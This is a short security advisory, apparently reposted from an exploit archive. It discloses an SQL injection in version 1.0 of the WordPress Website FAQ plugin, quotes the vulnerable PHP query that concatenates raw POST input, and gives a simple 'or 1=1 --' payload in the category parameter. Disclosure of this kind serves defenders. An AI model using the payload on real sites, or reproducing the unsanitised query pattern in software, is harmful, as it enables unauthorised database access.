WordPress Website FAQ 1.0 SQL Injection

2012.06.27
Credit: Chris Kellum
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection # Date: 6/25/12 # Exploit Author: Chris Kellum # Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/ # Software Link: http://downloads.wordpress.org/plugin/website-faq.zip # Version: 1.0 ============================================================================== Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php ============================================================================== Lines 106-115: function displayAnswer() { global $wpdb; $master_table = $wpdb->prefix . "faq"; $category = $_POST['category']; $searchtxt = $_POST['searchtxt']; if($category!=0) { $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'"; } =============================================================== Vulnerability Details: faq_category vulnerable to SQL injection =============================================================== When submitting a query via the widget, intercept the post request via burp or other proxy to find the following: action=displayAnswer&category=1&searchtxt=[your query] Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.

References:

http://wordpress.org/extend/plugins/website-faq/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top